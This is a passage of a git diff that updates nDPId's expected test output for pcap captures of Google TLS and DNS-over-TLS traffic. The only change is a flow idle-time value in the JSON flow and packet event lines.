+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434443394851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434443394851,"pkt":"AA6OTbSogMbKAJ6fCABFAAAoBqNAAEAG146sHwPg2DrUZKdTAbt6Z3Lr7iMRFFAQFtCmzAAA"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","packets-captured":28,"packets-processed":28,"total-skipped-flows":0,"total-l4-data-len":7568,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1434443401353} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 28/28 diff --git a/test/results/googledns_android10.pcap.out b/test/results/googledns_android10.pcap.out index a0d1e73c9..d1fef874f 100644 --- a/test/results/googledns_android10.pcap.out +++ b/test/results/googledns_android10.pcap.out @@ -1,61 +1,61 @@ 00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"googledns_android10.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592552824409} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552824409,"flow_last_seen":1592552824409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552824409,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592552824409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824409,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gpUAAHcG7tcICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT59wAAAQEIChWqa0r\/\/5Cw"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592552824632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824632,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gzYAAHcG7jYICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT5GAAAAQEIChWqbCn\/\/5Cw"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592552824856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824856,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0g5MAAHcG7dkICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT4OAAAAQEIChWqbQn\/\/5Cw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8tGBAAEAGuAjAqAGfCAgEBLusA1UTsXihAAAAAKAC\/\/9hlgAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8yAFAAEAGoGPAqAGfCAgICNrYA1WXsATAAAAAAKAC\/\/8uSAAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552824409,"flow_last_seen":1592552824409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552824409,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592552824409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824409,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gpUAAHcG7tcICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT59wAAAQEIChWqa0r\/\/5Cw"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592552824632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824632,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gzYAAHcG7jYICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT5GAAAAQEIChWqbCn\/\/5Cw"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592552824856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824856,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0g5MAAHcG7dkICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT4OAAAAQEIChWqbQn\/\/5Cw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8tGBAAEAGuAjAqAGfCAgEBLusA1UTsXihAAAAAKAC\/\/9hlgAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8yAFAAEAGoGPAqAGfCAgICNrYA1WXsATAAAAAAKAC\/\/8uSAAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="} 